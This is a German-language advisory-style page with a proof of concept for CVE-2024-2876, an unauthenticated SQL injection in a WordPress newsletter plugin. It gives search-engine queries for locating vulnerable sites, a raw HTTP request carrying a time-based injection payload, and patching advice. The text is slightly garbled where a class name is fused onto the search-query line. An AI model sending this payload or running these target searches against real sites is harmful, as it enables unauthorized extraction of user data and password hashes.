
Proof-of-Concept-Exploit für CVE-2024-2876, eine kritische SQL-Injection im WordPress-Plugin Email Subscribers by Icegram Express, die es nicht authentifizierten Angreifern ermöglicht, beliebige SQL-Abfragen auszuführen.
CVE-2024-2876 ist eine kritische Sicherheitslücke im Plugin „Email Subscribers by Icegram Express" für WordPress. Diese Schwachstelle betrifft Versionen bis einschließlich 5.7.14 und stellt ein erhebliches Risiko für über 90.000 Websites dar.
Bei der Schwachstelle handelt es sich um einen SQL-Injection-Fehler, der nicht authentifizierten Angreifern die Ausführung bösartiger SQL-Abfragen auf den betroffenen WordPress-Datenbanken ermöglicht. Durch die Manipulation von Benutzereingaben, die nicht ordnungsgemäß bereinigt werden, können Angreifer vertrauliche Informationen wie Benutzernamen, E-Mail-Adressen, Passwort-Hashes und Abonnentenlisten extrahieren.
Die SQL-Injection tritt innerhalb der run-Funktion der -Klasse des Plugins auf, wo eine unzureichende Eingabevalidierung zur unbefugten Ausführung von SQL-Code führt. Dies gefährdet die Integrität und Vertraulichkeit der in der WordPress-Datenbank gespeicherten Daten.
IG_ES_Subscribers_QueryFOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Sofortiges Update: Wenn Sie das Plugin „Email Subscribers by Icegram Express" verwenden, aktualisieren Sie es umgehend auf Version 5.7.15 oder höher, um den Sicherheitspatch anzuwenden.
Regelmäßige Audits: Überprüfen und aktualisieren Sie regelmäßig alle WordPress-Plugins und -Themes auf die neuesten Versionen, um die Sicherheit zu gewährleisten.
Sicherheits-Plugins: Verwenden Sie seriöse WordPress-Sicherheits-Plugins, um den Schutz gegen SQL-Injection und andere Cyber-Bedrohungen zu verbessern.
Starke Passwortrichtlinien: Implementieren Sie starke und eindeutige Passwörter für alle Konten, die mit Ihrer WordPress-Website verbunden sind, um das Risiko unbefugten Zugriffs zu verringern.
Wenn das betroffene Plugin nicht aktualisiert wird, bleiben Websites anfällig für Datenverletzungen und unbefugten Zugriff. Angesichts der weiten Verbreitung dieses Plugins ist sofortiges Handeln entscheidend, um Installationen abzusichern.